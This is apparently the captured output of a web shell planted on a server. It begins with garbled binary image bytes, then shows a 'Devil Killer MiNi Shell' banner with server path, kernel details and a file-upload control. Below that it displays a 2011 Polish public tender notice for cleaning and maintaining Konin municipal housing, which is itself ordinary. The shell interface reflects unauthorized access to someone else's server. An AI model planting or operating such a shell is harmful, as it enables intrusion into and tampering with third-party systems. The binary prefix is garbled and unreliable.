JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/67998-N-2011.html

<p class="kh_header"><b>Konin: Sprzątanie i utrzymanie czystości w zasobach Miejskiego TBS Sp. z o.o. w Koninie</b><br>
<b>Numer ogłoszenia: 67998 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Towarzystwo Budownictwa Społecznego Sp. z o. o. , ul. 3 Maja 21, 62-500 Konin, woj. wielkopolskie, tel. (063) 245 75 41, faks (063) 245 76 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konin.pl/mtbs</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie i utrzymanie czystości w zasobach Miejskiego TBS Sp. z o.o. w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sprzątanie i utrzymanie czystości w zasobach Miejskiego TBS Sp. z o.o. w Koninie .
zgodnie z z pkt.14. SIWZ i załącznikami nr 1 i 1a do umowy 
I. Podstawowe obowiązki Wykonawcy:
1.Nadzór nad prawidłowym korzystaniem z pomieszczeń wspólnego użytku znajdujących się w obiekcie.
2.Nadzór nad sprawnym działaniem instalacji i urządzeń technicznych znajdujących się w obiekcie.
3.Niezwłoczne informowanie Zamawiającego o złym stanie technicznym elementów małej architektury i urządzeń znajdujących się na placu zabaw.
4.Zgłaszanie Zamawiającemu zauważonych dewastacji i usterek urządzeń technicznych oraz instalacji.
5.Przestrzeganie przepisów o ochronie przeciwpożarowej, a w szczególności utrzymanie w należytym stanie korytarzy piwnicznych i klatek schodowych.
6.Nadzór nad sprawnym działaniem wszystkich punktów świetlnych w części wspólnej budynku i przed budynkiem, wraz z wymianą żarówek w łatwo dostępnych oprawach.
7.Roznoszenie na terenie obiektu zawiadomień i wszelkiej korespondencji do mieszkańców, za potwierdzeniem odbioru.
8.Wywieszanie / zdejmowanie ogłoszeń i zawiadomień dostarczanych przez Zamawiającego.
9.Usuwanie plakatów, ogłoszeń, naklejek itp. umieszczanych przez osoby postronne bez zgody Zamawiającego.
10.Wywieszanie / zdejmowanie powierzonych flag.
11.Wykonywanie innych czynności na polecenie Zamawiającego.
12.Wykonywanie usług objętych umową we wszystkie dni robocze w godzinach ustalonych pisemnie z przedstawicielem Wykonawcy.
13. Wykonywanie usług objętych umową w niedziele, święta i inne dni wolne od pracy w szczególnych przypadkach oraz w razie wystąpienia opadów śniegu          i gołoledzi.

II. Codzienne obowiązki Wykonawcy:
1.Omiatanie całych klatek schodowych, wiatrołapów oraz zejść do piwnic.
2.Omiatanie oraz usuwanie wszelkich zanieczyszczeń z chodników, trawników, dróg wewnętrznych, parkingów i śmietników.
3.Opróżnianie znajdujących się przy budynkach koszy na śmieci.
4.Dbanie o prawidłową segregację odpadów komunalnych (kontenery specjalne -szkło, plastik, papier) oraz właściwe i racjonalne napełnianie kontenerów.
5.W okresie zimowym odśnieżanie i posypywanie piaskiem z solą chodników, parkingów i dróg wewnętrznych (także w niedziele, święta i inne dni wolne od pracy).
6.Zgłaszanie Zamawiającemu potrzeby wywozu nieczystości stałych i rzetelne potwierdzanie ilości faktycznie opróżnionych pojemników.  
7.Kontrola prawidłowego zamknięcia wszystkich włazów dachowych, okien na klatkach schodowych, szafek energetycznych.
8.Kontrola stanu elementów przeszklonych (niezwłoczne sprzątanie rozbitego szkła w celu likwidacji zagrożenia skaleczeniem).

III. Obowiązki okresowe Wykonawcy:
1.Sprzątanie pomieszczeń gospodarczych i pomieszczeń przeznaczonych do użytku wspólnego (każdorazowo w razie potrzeby, minimum 1 raz w miesiącu).
2.Mycie klatek schodowych od wejścia, przez wiatrołap do drzwi piwnicznych (każdorazowo w razie potrzeby, minimum 1 raz w tygodniu).
3.Czyszczenie balustrad, parapetów, grzejników, skrzynek pocztowych, szafek instalacyjnych, gablot ogłoszeniowych, rurociągów oraz innego wyposażenia klatek schodowych i piwnic (każdorazowo w razie potrzeby, minimum 1 raz w tygodniu).
4.Mycie okien i drzwi (wejściowych do budynku oraz do pomieszczeń  oraz bram i szlabanów wjazdowych (4 razy w ciągu roku, tj. w miesiącach: marzec, czerwiec, wrzesień, grudzień).
5.Czyszczenie koszy w rurach spustowych wody deszczowej (4 razy w ciągu roku,tj. w miesiącach: marzec, sierpień, październik, grudzień).
6.Prace pielęgnacyjne terenów zielonych (każdorazowo w razie potrzeby):
      - koszenie trawników i wywóz skoszonej trawy,
      - podlewanie, nawożenie, odchwaszczanie, opryski,
      - cięcie pielęgnacyjne drzew i krzewów,
      - zagrabianie i sprzątanie opadłych liści,
7.Wymiana piasku w piaskownicach (1 raz w roku, wiosną) obejmująca:
- wybranie i wywóz starego piasku z piaskownic,
- zakup i przywóz świeżego piasku oraz napełnienie piaskownic.
8.Dowóz piasku i soli do posypywania w okresie zimowym oraz zabezpieczenie zapasu piasku przed zamarzaniem.
9.Odkażanie placyków gospodarczych (każdorazowo w razie potrzeby).
10.Likwidacja drobnych usterek oraz wykonywanie prac podnoszących sprawność techniczną i estetykę nieruchomości.

IV. Obowiązki dodatkowe Wykonawcy i zalecenia Zamawiającego:
1.Wykonawca zatrudni jako Gospodarzy poszczególnych obiektów osoby  cechujące się kulturą osobistą, schludnym wyglądem oraz dbające o utrzymanie dobrych relacji  z mieszkańcami obiektów.
2.Gospodarze poszczególnych obiektów zobowiązani są do rozpoczęcia pracy rano w godzinach 6.00 - 8.00 (w przypadku opadów śniegu lub gołoledzi, prace  należy rozpocząć niezwłocznie). 
3.Czas pracy poszczególnych Gospodarzy Wykonawca uzgodni z Zamawiającym. Aktualny wykaz osób pełniących funkcję Gospodarzy poszczególnych obiektów wraz z numerami telefonów kontaktowych oraz godzinami pracy, Wykonawca będzie przekazywał Zamawiającemu.
4.Wykonawca zapewni Gospodarzom poszczególnych obiektów środki łączności 
telefonicznej. 
Numery telefonów zostaną umieszczone na tablicach informacyjnych poszczególnych obiektów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.63.00.00-2, 90.62.00.00-9, 77.31.41.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca  składając ofertę musi wnieść  wadium  w wysokości  10.000,00 zł,-

W przypadku składania oferty na więcej niż jedną część zamówienia należy złożyć oddzielnie wadium na każdą część.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca będzie posiadał niezbędną wiedzę i doświadczenie w wykonywaniu usług objętych  przedmiotem zamówienia wyrażające się wykonaniem  w okresie ostatnich 3 lat przed dniem wszczęcia  postępowania  o  udzielenie zamówienia, a jeżeli  okres prowadzenia działalności jest  krótszy  - w tym okresie,  minimum 2 usług związanych  ze sprzątaniem budynków mieszkalnych wielorodzinnych o powierzchni sprzątanej minimum 30 000 m2.

 W przypadku składania oferty wspólnej warunek zostanie uznany przez zamawiającego za   spełniony , jeżeli  wykonawcy składający ofertę wspólną będą spełniać go łącznie. 

Ocena spełniania warunku dokonana  zostanie zgodnie z formułą  spełnia- nie spełnia 
na podstawie dokumentu określonego w części III pkt. 8.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania warunku.
Ocena spełniania warunku dokonana  zostanie zgodnie z formułą spełnia - nie spełnia    na podstawie oświadczenia    określonego w części III pkt. 8.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca będzie dysponował dla potrzeb niniejszego postępowania osobami zdolnymi do wykonania przedmiotu zamówienia tj. minimum 3 osobami w części I i  minimum 4 osobami w części II.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli :

Wykonawca będzie posiadał opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż  500.000,00 zł

W przypadku składania oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony , jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.

Ocena spełniania warunku dokonana  zostanie zgodnie z formułą  spełnia - nie spełnia  na podstawie dokumentu    określonego w części III pkt. 8.1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w formie pisemnej pod rygorem nieważności w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy pod warunkiem wystąpienia co najmniej jednej 
z okoliczności wymienionych poniżej:
1.zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne 
2.wynikających ze zmian danych w rejestrach publicznych.
3.dopuszcza się zmianę postanowień zawartej umowy w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.konin.pl/mtbs.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia w cenie 24,60 zł brutto można uzyskać w siedzibie Miejskiego TBS Sp. z o.o. w Koninie - ul.3 Maja 21, 62-500 Konin- sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2011 godzina 10:00, miejsce: Miejskie TBS Sp. z o.o. w Koninie - ul.3 Maja 21, 62-500 Konin- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzątanie i utrzymanie czystości w zasobach Miejskiego TBS Sp. z o.o. w Koninie - Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprzątanie i utrzymanie czystości w zasobach Miejskiego TBS Sp. z o.o. w Koninie 
I. Podstawowe obowiązki Wykonawcy:
1.Nadzór nad prawidłowym korzystaniem z pomieszczeń wspólnego użytku znajdujących się w obiekcie.
2.Nadzór nad sprawnym działaniem instalacji i urządzeń technicznych znajdujących się w obiekcie.
3.Niezwłoczne informowanie Zamawiającego o złym stanie technicznym elementów małej architektury i urządzeń znajdujących się na placu zabaw.
4.Zgłaszanie Zamawiającemu zauważonych dewastacji i usterek urządzeń technicznych oraz instalacji.
5.Przestrzeganie przepisów o ochronie przeciwpożarowej, a w szczególności utrzymanie w należytym stanie korytarzy piwnicznych i klatek schodowych.
6.Nadzór nad sprawnym działaniem wszystkich punktów świetlnych w części wspólnej budynku i przed budynkiem, wraz z wymianą żarówek w łatwo dostępnych oprawach.
7.Roznoszenie na terenie obiektu zawiadomień i wszelkiej korespondencji do mieszkańców, za potwierdzeniem odbioru.
8.Wywieszanie / zdejmowanie ogłoszeń i zawiadomień dostarczanych przez Zamawiającego.
9.Usuwanie plakatów, ogłoszeń, naklejek itp. umieszczanych przez osoby postronne bez zgody Zamawiającego.
10.Wywieszanie / zdejmowanie powierzonych flag.
11.Wykonywanie innych czynności na polecenie Zamawiającego.
12.Wykonywanie usług objętych umową we wszystkie dni robocze w godzinach ustalonych pisemnie z przedstawicielem Wykonawcy.
13. Wykonywanie usług objętych umową w niedziele, święta i inne dni wolne od pracy w szczególnych przypadkach oraz w razie wystąpienia opadów śniegu          i gołoledzi.

II. Codzienne obowiązki Wykonawcy:
1.Omiatanie całych klatek schodowych, wiatrołapów oraz zejść do piwnic.
2.Omiatanie oraz usuwanie wszelkich zanieczyszczeń z chodników, trawników, dróg wewnętrznych, parkingów i śmietników.
3.Opróżnianie znajdujących się przy budynkach koszy na śmieci.
4.Dbanie o prawidłową segregację odpadów komunalnych (kontenery specjalne -szkło, plastik, papier) oraz właściwe i racjonalne napełnianie kontenerów.
5.W okresie zimowym odśnieżanie i posypywanie piaskiem z solą chodników, parkingów i dróg wewnętrznych (także w niedziele, święta i inne dni wolne od pracy).
6.Zgłaszanie Zamawiającemu potrzeby wywozu nieczystości stałych i rzetelne potwierdzanie ilości faktycznie opróżnionych pojemników.  
7.Kontrola prawidłowego zamknięcia wszystkich włazów dachowych, okien na klatkach schodowych, szafek energetycznych.
8.Kontrola stanu elementów przeszklonych (niezwłoczne sprzątanie rozbitego szkła w celu likwidacji zagrożenia skaleczeniem).

III. Obowiązki okresowe Wykonawcy:
1.Sprzątanie pomieszczeń gospodarczych i pomieszczeń przeznaczonych do użytku wspólnego (każdorazowo w razie potrzeby, minimum 1 raz w miesiącu).
2.Mycie klatek schodowych od wejścia, przez wiatrołap do drzwi piwnicznych (każdorazowo w razie potrzeby, minimum 1 raz w tygodniu).
3.Czyszczenie balustrad, parapetów, grzejników, skrzynek pocztowych, szafek instalacyjnych, gablot ogłoszeniowych, rurociągów oraz innego wyposażenia klatek schodowych i piwnic (każdorazowo w razie potrzeby, minimum 1 raz w tygodniu).
4.Mycie okien i drzwi (wejściowych do budynku oraz do pomieszczeń  oraz bram i szlabanów wjazdowych (4 razy w ciągu roku, tj. w miesiącach: marzec, czerwiec, wrzesień, grudzień).
5.Czyszczenie koszy w rurach spustowych wody deszczowej (4 razy w ciągu roku,tj. w miesiącach: marzec, sierpień, październik, grudzień).
6.Prace pielęgnacyjne terenów zielonych (każdorazowo w razie potrzeby):
      - koszenie trawników i wywóz skoszonej trawy,
      - podlewanie, nawożenie, odchwaszczanie, opryski,
      - cięcie pielęgnacyjne drzew i krzewów,
      - zagrabianie i sprzątanie opadłych liści,
7.Wymiana piasku w piaskownicach (1 raz w roku, wiosną) obejmująca:
- wybranie i wywóz starego piasku z piaskownic,
- zakup i przywóz świeżego piasku oraz napełnienie piaskownic.
8.Dowóz piasku i soli do posypywania w okresie zimowym oraz zabezpieczenie zapasu piasku przed zamarzaniem.
9.Odkażanie placyków gospodarczych (każdorazowo w razie potrzeby).
10.Likwidacja drobnych usterek oraz wykonywanie prac podnoszących sprawność techniczną i estetykę nieruchomości.

IV. Obowiązki dodatkowe Wykonawcy i zalecenia Zamawiającego:
1.Wykonawca zatrudni jako Gospodarzy poszczególnych obiektów osoby  cechujące się kulturą osobistą, schludnym wyglądem oraz dbające o utrzymanie dobrych relacji  z mieszkańcami obiektów.
2.Gospodarze poszczególnych obiektów zobowiązani są do rozpoczęcia pracy rano w godzinach 6.00 - 8.00 (w przypadku opadów śniegu lub gołoledzi, prace  należy rozpocząć niezwłocznie). 
3.Czas pracy poszczególnych Gospodarzy Wykonawca uzgodni z Zamawiającym. Aktualny wykaz osób pełniących funkcję Gospodarzy poszczególnych obiektów wraz z numerami telefonów kontaktowych oraz godzinami pracy, Wykonawca będzie przekazywał Zamawiającemu.
4.Wykonawca zapewni Gospodarzom poszczególnych obiektów środki łączności 
telefonicznej. 
Numery telefonów zostaną umieszczone na tablicach informacyjnych poszczególnych obiektów.

V. Zlecone obiekty :Dla części I 

1.Budynek mieszkalny wielorodzinny (38 mieszkań) wraz z terenem przynależnym przy ul. Żwirki i Wigury 7 w Koninie
2.Budynek administracyjno-biurowy przy ul. 3 Maja 21w Koninie:
3.Budynek mieszkalny wielorodzinny (71 mieszkań) wraz z terenem przynależnym przy ul.Piłsudskiego 20 w Koninie:
4.Budynek mieszkalny wielorodzinny (17 mieszkań) wraz z terenem przynależnym przy ul.Obr.Wersterplatte 5 w Koninie:
5.Budynek mieszkalny wielorodzinny (37 mieszkań) wraz z terenem przynależnym przy ul.Słowackiego 1 oraz oraz teren zewn. przy części admin-biurowej przy Pl.Wolności 6 w Koninie:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.63.00.00-2, 90.62.00.00-9, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzątanie i utrzymanie czystości w zasobach Miejskiego TBS Sp. z o.o. w Koninie.</p>
